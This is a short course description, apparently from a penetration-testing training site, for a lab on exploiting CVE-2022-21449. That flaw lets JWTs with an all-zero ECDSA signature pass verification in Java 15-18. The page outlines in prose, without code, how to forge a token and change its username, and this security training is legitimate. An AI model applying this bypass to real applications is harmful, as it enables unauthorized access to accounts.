This exercise covers the exploitation of CVE-2022-21449 against a Java Application relying on JWT

< 1 Hr.
Brown Badge


This course delves into the exploitation of a Spring application that uses JSON Web Tokens (JWT) for authentication, leveraging a vulnerability in the Java implementation of Elliptic Curve Digital Signature Algorithm (ECDSA) identified as CVE-2022-21449. The vulnerability affects Java versions 15 through 18 and allows attackers to bypass signature verification by forging signatures where both 'r' and 's' components are zero. The course includes detailed instructions on generating such a malicious signature using JWT libraries in various programming languages and applying it to gain unauthorized access.

The practical challenge involves generating a JWT with a forged ECDSA signature, logging in to obtain a valid token, modifying the username to "," and replacing the legitimate signature with the malicious one. This hands-on approach not only demonstrates the severity of the vulnerability but also equips learners with the skills to identify and exploit similar flaws in real-world applications. The course is inspired by the blog post "Psychic Signatures in Java" and aims to enhance understanding of cryptographic vulnerabilities in Java applications.

Want to learn more? Get started with PentesterLab Pro! GO PRO